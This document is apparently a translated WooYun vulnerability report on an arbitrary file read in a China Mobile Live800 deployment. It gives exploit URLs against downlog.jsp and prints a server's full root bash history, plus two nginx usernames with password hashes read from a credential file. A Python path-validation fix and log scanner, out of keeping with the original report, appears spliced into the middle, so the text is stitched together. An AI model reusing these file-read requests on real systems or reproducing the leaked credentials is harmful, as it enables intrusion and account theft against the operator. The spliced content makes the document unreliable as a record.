Arbitrary File Read on a China Mobile Site

Posted by admin, 2017-04-22 05:31:19

Summary

2016-04-21: Details reported to the vendor; awaiting vendor response
2016-04-25: Vendor confirmed the issue; details disclosed to the vendor only
2016-05-05: Details disclosed to core white hats and experts in the relevant field
2016-05-15: Details disclosed to regular white hats
2016-05-25: Details disclosed to intern white hats
2016-06-09: Details disclosed to the public

Vulnerability Overview

Defect ID: WooYun-2016-198788

Title: Arbitrary file read on a China Mobile site

Vendor: China Mobile

Author: 小川

Submitted: 2016-04-21 13:30

Published: 2016-06-09 16:20

Vulnerability type: Sensitive information disclosure

Severity: Medium

Self-assessed Rank: 8

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: www.wooyun.org. For questions or assistance, please get in touch.

Tags: Sensitive information disclosure


Vulnerability Details

Brief description:

Arbitrary file read on a China Mobile site

Detailed description:

The application runs with root privileges, so the root user's shell command history can be read:

http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/root/.bash_history

cd

cd

ls

cd /

find ./ -name 'nginx*'

cd ./usr/local/nginx

ls

cd sbin

ls

./nginx -v

ps -ef|grep nginx

cd ..

ls

cd conf

ls

cat nginx.conf

vi nginx.conf

ls

cd ..

ls

cd sbin

ls

./nginx

ifconfig -a

ls

cd ..

ls

cd conf

ls

vi nginx.conf

ls

ps -ef|grep nginx

cd ..

ls

cd bin

cd sbin

ls

./nginx -s reload

ps -ef|grep nginx

ps -ef|grep nginx

./nginx -s stop

ps -ef|grep nginx

./nginx

ps -ef|grep nginx

ifconfig -a

ls

export TMOUT=0

ls

cd /

find ./ -name 'nginx'

cd usr

cd local

cd nginx

ls

cd conf

ls -ltr |wc -l

ls

ls -ltr

cat nginx.conf.default

ls

pwd

ifconfig -a

cd ..

ls

cd html

ls

cd ..

ls

pwd

cd html

ls

cd ..

ls

find ./ -name 'emapdomains*'

cd client_body_temp

ls

cd ..

ls

cd fastcgi_temp

ls

cd ..

ls

cd proxy_temp

ls

cat 1

cd 1

ls

file 00

cd 00

ls

cd ..

ls

cd ..

ls

cd ..

ls

cd scgi_temp

ls

cd ..

ls

cd uwsgi_temp

ls

cd ..

ls

cd on

ls

cd conf

ls

ls -ltr

cat mime.types

ls -ltr|wc -l

ls -ltr

cd

cd etc

cd /etc

ls

cat hosts

cat resolv.conf

cd /usr/local

cd nginx

ls

cd conf

ls

cat nginx.conf

cat upstream.conf

cat nginx.conf

ls

more proxy.conf

ls -ltr

cat proxy.conf

ls -ltr

cat upstream.conf

cd

ls

cd /

find ./ -name '*emapdomains*'

ls

cd /usr/local

ls

cd nginx

ls

cd conf

ls

grep emapdomains *

ls

cd ..

ls

cd logs

ls

pwd

cd ..

ls

cd conf

ls

ls

pwd

ifconfig -a

ls

cd ..

ls

tar cvf ../nginx_conf_byld_20160113.tar conf

ls

cd ..

ls

ls

export TMOUT=0

ls

ps -ef|grep nginx

cd /

find ./ -name

find ./ -name 'nginx*'

pwd

find ./ -name '**.**.**.**'

cd /usr/local

cd nginx

ls

cd conf

ls

cat nginx-conf

ifconfig -a

ls -ltr

cd key

ls

cd ..

ls

cat ngx_passwd

pwd

cd /usr

ls

cd local

ls

cd bushu

cd nginx

ls

cd

cd /

ls

find ./ -name 'configure'

more ./home/Nginx/pcre-8.35/configure

!

ls

ls

ls

cd

ls

cd ..

ls

cd /usr

ls

cd local

ls

cd sbin

ls

cd ..

ls

cd nginx

ls

cd conf

ls

cd ..

ls

cd logs

ls

ls -ltr

cd data

ls

cat *

cd

ls

ls

cd /usr

cd local

ls

cd nginx

ls

cd conf

ls

cat upstaream.conf

more upstream.conf

ls

more nginx.conf

ls

more upstream.conf

cd ..

ls

cd sbin

ls

./nginx

ps -ef|grep nginx

export TMOUT=0

cd /usr/local/nginx

cd /etc/init.d

ls

cd ..

vi hosts

cd /usr/local/nginx

ls

cd conf/

ls

cat upstream.conf

cd /etc/init.x

cd /etc/init.d

vi nginx

ps -ef | grep ngixn

ps -ef | grep nginx

cd /usr/local

ls

cd nginx

ls

cd conf

ls

ls -ltr

more nginx.conf

vi nginx.conf

ifconfig

exit

cd /usr/local

ls

cd nginx

ls

pwd

cd html

ls

ls -ltr

cd ../conf

ls

vi nginx.conf

ifconfig

cd /usr/local

ls

cd nginx

ls

ls -ltr

cd conf

ls

vi nginx.conf

ls

cd /usr

cd local

ls

cd nginx

ls

ps -ef|grep nginx

cd logs

ls -ltr

tail -f access-bassapp.log

ls -ltr

grep mbomc access-bassapp.log

grep mbomc access.log

cd ..

ls

cd conf

ls

vi nginx.conf

;s

ls

cd /usr

cd local

ls

cd nginx

ls

cd logs

ls -ltr

tail -f access.log

ls -ltr

tail -10000f access-mbomc.log

cd /usr

cd local

cd nginx

ls

cd sbin

ls

./nginx -s reload

ps -ef|grep nginx

cd /

find ./ -name 'Squid'

find ./ -name Squid

find ./ -name squid

ps -ef|grep squid

export TMOUT=0

ls

cd /usr

ls

cd local

ls

cd nginx

ls

cd conf

ls

vi nginx.conf

vi nginx.conf

ls

cd ..

ls

ls

export TMOUT=0

ls

cd conf

ls

ls -ltr

exit

ls

ls -ltr

ls

cd /usr

ls

cd local

ls

cd nginx

ls

cd conf

ls

vi nginx.conf

ls

cd ../sbin

ls

./nginx -s stop

vi /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx

exit

ls

export TMOUT=0

ls

cd /usr

ls

cd local

ls

cd nginx

cd conf

ls

vi upstream.conf

pwd

ifconfig -a

pwd

cd ../sbin

ls

./nginx -s stop

ps -ef|grep nginx

ls

cd ..

ls

cd conf

ls

vi upstream.conf

cd ../sbin

ls

./nginx -s stop

cd ../conf

ls

vi upstream.conf

cd ../sbin

ls

./nginx -s stop

ps -ef|grep nginx

pwd

/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx

exit

ls

cd /usr/local

cd nginx

cd conf

vi nginx.conf

cd ../sbin

./nginx -s reload

ps -ef|grep nginx

cd /usr/local/nginx

cd conf/

vi nginx.conf

vi nginx.conf

cd ../sbin/

ls

./nginx -s reload

vi ../conf/nginx.conf

./nginx -s reload

cd ../conf/

ls

vi upstream.conf

vi ../conf/nginx.conf

cd ../sbin/

./nginx -s reload

exit

ipconfig -a

ipfongi

ipconfig

ifconfig

uname -a

top

ifconfig

ls

uname -a

ps

ssh root@**.**.**.**

ls -ltr

ls -ltr /usr/local/nginx/sbin/nginx*

/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx.conf

ps -ef|grep nginx

cd

ls

cd ..

ls

cd /home

ls

cd live800

ls

cat startLive800Server.sh

./startLive800Server.sh

ps -ef|grep tomcat

ifconfig

ifconfig |more

netstat -rn

ping **.**.**.**

ssh **.**.**.**

who

ls

cd /

find ./ -name squid

cd ./etc/squid

ls

pwd

cd ./usr/sbin/

cd /

cd ./usr/sbin/

ls

./usr/sbin/squid -s

cd /

/usr/sbin/squid -s

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

ps -ef|grep squid

exit

cd /

find ./ -name 'squid'

/usr/sbin/squid -s

ps -ef|grep squid

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

more nginx.conf

ls

more nginx.conf

exit

cd /usr/local/nginx

ls

cd conf/

vi nginx.conf

cd ../sbin

./nginx -s reload

cd ..logs

cd ../logs

ls

tail -f access.log

cd ..

cd conf/

ls

vi upstream.conf

cd ../sbin/

./nginx -s reload

exit

ls

ls

cd

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

more nginx.conf

ls

cd

ls

ls

ps -ef|grep nginx

/usr/local/nginx/sbin/nginx -s reload

ps -ef|grep nginx

exit

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

cd ..

ls

cd logs

ls

ls -ltr

tail -f access.log

ping **.**.**.**

tail -f access-mbomc.log

ping **.**.**.**

ping **.**.**.**

ls

export TMOUT=0

ls

cd

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

ls -ltr

cd ..

ls

cd logs

ls

ls -ltr

tail -1000f access-mbomc.log

LS

ls

ls -ltr

tail -f access-mbomc.log

ls

ls -ltr

tail -f access-mbomc.log

ls -ltr

ipconfig -a

ifconfig -a

ssh root@**.**.**.**

ssh root@**.**.**.**

cd

ls

cd /usr/local/nginx

ls

cd conf

ls

more nginx.conf

ls

ifconfig -a

uname -a

ls

pwd

cd /home

ls

cd live800

ls

cd working

ls

cd tomcat

ls

ls

cd /

find ./ -name 'live800'

cd ./home/live800

ls

cd ./home/live800/working/tomcat/live800

ls

cd working

ls

cd tomcat

ls

cd ..

ls

cd ..

ls

more startLive800Server.sh

cd ../tomcat/

ls

cd working

ls

cd tomcat

ls

ls -ltr

cd webapps

ls

cd live800

ls

pwd

cd /home/live800/working/tomcat/webapps/live800

cd live800

]

ifconfig -a

uname

cd /home

ls

cd /live800

cd live800

ls

startLive800Server.sh

sh startLive800Server.sh

ps -ef|grep live800

ps -ef|grep nginx

cd /usr/local

ls

ls

cd /usr/local

ls

cd gninx

cd nginx

ls

cd sbin

ls

pwd

export TMOUT=0

cd ..

ls

cd conf

ls

pwd

cd

/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf

ps -ef|grep nginx

ls

cd /home

cd live800

ls

ls -ltr

cd working

ls

ftp **.**.**.**

cd /home

cd live800

ls

cd /work

cd /working

ls

cd working

ls

cd tomcat

ls

cd live800

ls

cd chatClient

ls

cd chinamobile

ls

cd scripts

ls -F

cd chatbox.js

ls

ls -F

ls -l

cd

ls

cd /home

ls

cd live800

ls

cd working

ls

cd tomcat

ls

cd tomcat

ls

cd ..

ls

cd tomcat

ls

cd webapps

ls

ls -ltr

cd live800

ls

ls -ltr zxkf_index.jsp

ls -ltr *index.jsp*

more index.jsp

more showAccount.jsp

more showAccount.jsp

ls -ltr chatbox.jsp

ls

cd chatClient

ls

more chatbox.htm

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

more nginx.conf

ls

ls -ltr

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

vi nginx.conf

cd ..

ls

cd sbin

ls

./nginx -s reload

ps -ef|grep nginx

exit

ps -ef | grep ngix

ps -ef | grep ng

ps -ef|grep nginx

cat /usr/local/nginx/conf/nginx.conf

env

ls

find . -name | grep 'index2'

find . -name *.* | grep 'index2'

find . -name 'index2'

find . -name 'index2'pwd

cd ..

ls

find . -name 'index2'

find . -name 'index2.jsp'

cat ./sys/devices/system/cpu/cpu15/cache/index2

cd ./sys/devices/system/cpu/cpu15/cache/index2

ls

cd ..

ls

cd

cd ..

ls

find . -name 'index2.jsp'

cd /home

cd /live800

ls

cd live800

ls

cd working

ls -l

cd tomcat

ls -l

cd webapps

ls

cd live800

ls -l

ls

ls

ls

cd /home

ls

cd live800

ls

cd working

ls

ps -ef|grep nginx

cd /usr/local/nginx/sbin/

./nginx -s reload

export TMOUT=0

./nginx -s reload

ls

cd ..

ls

cd conf

ls

vi nginx.conf

cd ..

ls

cd sbin

./nginx -s reload

cd ..

cd conf

ls

vi nginx.conf

ls

cd /dev

ls

cd shm

ls

cdls

cd

ls

ps -ef|grep nginx

cd /usr/local/nginx/conf/

ls

vi nginx.conf

vi proxy.conf

ls

cd cache

cd /cache

ls

cd proxy_temp_path

ls

ls -ltr

pwd

ls -ltr

rm *

ls

cd ..

ls

cd proxy_cache_path

ls

du -sm *

cd 0

ls

cd 00

ls

ifconfig

exit

ls

ls

ps -ef|grep nginx

cd /usr/local/nginx/sbin/

ls

./nginx -s reload

ls

ps -ef|grep nginx

pwd

cd ..

ls

cd client_body_temp

ls

cd ..

ls

cd fastcgi_temp

ls

cd ..

ls

cd html

ls

cd images

ls

cd ..

ls

cd ..

ls

cd on

cd proxy_temp

ls

file 1

cd 1

ls

file *

cd 00

ls

cd ..

ls

cd ..

ls

cd ..

ls

cd scgi_temp

ls

cd ..

ls

cd uwsgi_temp

ls

cd

export TMOUT=0

ssh **.**.**.**

ls

ps -ef | grep nginx

cat /usr/local/nginx/conf/nginx.conf

ls

pwd

ls -A

cd /home

ls

cd /live800

find ./ 'live800'

e ff

ls

sd ..

cd ..

pwd

cd /SDSSO/WebSSO/zxkf/zxkf_index.jsp

find ./'zxkf_index.jsp'

exit

ls

cd /home/live800/working/tomcat/webapps/live800

ls

cd /home/live800/working/tomcat/webapps/live800

ls

find .-name zxkf_index.jsp

cd ..

ls

cd ..

cd ..

ls

pwd

cd ..

cd ..

ls

pwd

cd .

ls

cd ..

find .-name zxkf_index.jsp

cd /home/live800/working/tomcat

ls

cd /restartTomcat.sh

exit

ls

pwd

/home/live800/working/

cd /home

ls

cd /live800

/home/live800/working/tomcat/webapps/live800

cd /home/live800/working/tomcat/webapps/live800

ps -ef|grep live800

ls

cd /home/live800

ls

cd /working

cd /home/live800/working/tomcat/webapps/live800

ps -ef|grep "live800"

ls

pwd

ps -ef|grep live800

ls

pwd

ls -f

find -name/ live800

find

ls

pwd

cd /home

ls

cd /weblogic

pwd

ps -ef| grep live800

ls -A

ls -a

ls

cd /home/live800/working/tomcat/restartTomcat.sh

cd /home/live800/working/tomcat/

ls

ls -a

pwd

find /-name live800

ls

cd /live800

find /-name "zxkf_index.jsp"

pwd

cd..

cd ..

cd

pwd

history 20

history 50

exit

ls

history 50

ls

pwd

ls -A

cd /SDSSO/WebSSO/zxkf/zxkf_index.jsp

cd /SDSSO

ls

ls

ls -a

Also noticed this: http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/usr/local/nginx/conf/ngx_passwd

zhangyong:2RsUTTsvOmOdA

zengqh:DunTiVFkBxz7A

These should be the nginx login passwords.
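The two reads above (the root shell history and the nginx password file) both come from the same defect: downlog.jsp passes the caller's path and fileName parameters to the file system without checking that the result stays under the directory the endpoint is meant to serve. The following Python is an added example, not code from the report or from the Live800 product. It shows the check a log-download handler should apply, and reuses that check to scan access log lines for requests that would have escaped the directory. LOG_ROOT, the sample log lines, the IP addresses and the combined-log layout are all constructed for the example; the report itself only shows that the application lives under /home/live800/working/tomcat.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs

# Assumed (not from the report): the directory a log-download endpoint such as
# downlog.jsp is meant to serve files from.
LOG_ROOT = "/home/live800/working/tomcat/logs"


def resolve_download_path(base_dir, path_param, file_param):
    """Return the absolute path under base_dir that a request may read, or None
    if the path/fileName pair would read outside base_dir.

    The vulnerable pattern is to hand path + fileName straight to the file
    API: an absolute fileName (/root/.bash_history, the nginx password file)
    or a ../ sequence then reads any file the process can open, which here
    meant every file on the host, because the service ran as root.
    """
    if not file_param or "\x00" in path_param or "\x00" in file_param:
        return None
    base = posixpath.normpath(base_dir)
    # Normalise the user-controlled part on its own first, so traversal that
    # would climb above base shows up as an absolute path or a leading "..".
    rel = posixpath.normpath(posixpath.join(path_param, file_param))
    if posixpath.isabs(rel) or rel == ".." or rel.startswith("../"):
        return None
    candidate = posixpath.normpath(posixpath.join(base, rel))
    # Belt and braces: the final path must still sit strictly inside base.
    if not candidate.startswith(base + "/"):
        return None
    return candidate


def flag_traversal_requests(access_log_lines, base_dir=LOG_ROOT):
    """Scan combined-format access log lines (nginx or Tomcat) and return the
    downlog.jsp requests whose parameters would escape base_dir, as
    (request_target, fileName) tuples, so past abuse of the endpoint can be
    found once the fix is in."""
    hits = []
    for line in access_log_lines:
        # The request line sits between the first pair of double quotes:
        # "GET /live800/downlog.jsp?path=/&fileName=... HTTP/1.1"
        try:
            request = line.split('"')[1]
            _method, target, _version = request.split(" ", 2)
        except (IndexError, ValueError):
            continue
        parts = urlsplit(target)
        if not parts.path.endswith("/downlog.jsp"):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)
        path_param = query.get("path", [""])[0]
        file_param = query.get("fileName", [""])[0]
        if resolve_download_path(base_dir, path_param, file_param) is None:
            hits.append((target, file_param))
    return hits


# Constructed sample log lines (private IPs, made-up sizes and agents).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [21/Apr/2016:13:30:01 +0800] "GET /live800/downlog.jsp?path=/&fileName=/root/.bash_history HTTP/1.1" 200 51234 "-" "curl/7.35.0"',
    '10.0.0.5 - - [21/Apr/2016:13:31:10 +0800] "GET /live800/downlog.jsp?path=/&fileName=/usr/local/nginx/conf/ngx_passwd HTTP/1.1" 200 60 "-" "curl/7.35.0"',
    '10.0.0.9 - - [21/Apr/2016:13:32:45 +0800] "GET /live800/downlog.jsp?path=app&fileName=access.log HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [21/Apr/2016:13:33:00 +0800] "GET /live800/index.jsp HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [21/Apr/2016:13:34:00 +0800] "GET /live800/downlog.jsp?path=app&fileName=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0 "-" "curl/7.35.0"',
]


if __name__ == "__main__":
    for target, name in flag_traversal_requests(SAMPLE_ACCESS_LOG):
        print("traversal attempt:", name, "via", target)
```

Two points worth noting in the design: the user-controlled part is normalised before it is joined to the base directory, because normalising only the joined result lets "app/../../etc/passwd" collapse to a clean-looking absolute path; and the scanner applies the very same function, so the detection rule and the fix cannot drift apart. Running it as root at all is the second, independent problem: even a correct path check only limits what the file read returns, not what a future bug in the same process can do.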

Proof of vulnerability:

Remediation:

Upgrade.

Copyright notice: when reposting, please credit the source 小川@乌云


Vendor Response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2016-04-25 16:18

Vendor reply:

CNVD has confirmed and reproduced the reported issue and has forwarded it via CNCERT to China Mobile Group, which will coordinate handling with the site's administration department.

Latest status:

None yet




Comments

  1. 2016-04-21 14:20 | Dotaer ( Passer-by | Rank:28 Vulns:8 | Study more, hunt more bugs! )

    0

    Front row, watching this!

  2. 2016-04-21 15:47 | 变色龙 ( Passer-by | Rank:2 Vulns:2 | Study hard and make progress every day. )

    0

    What important data was leaked?

  3. 2016-05-22 09:35 | sutdy ( Regular white hat | Rank:113 Vulns:37 | 0.0)

    0

    Reminder: your level is sufficient, but you cannot view vulnerabilities from white hats with a higher Rank than your own (you can wait for further disclosure or pay 4 WooYun coins to view it early
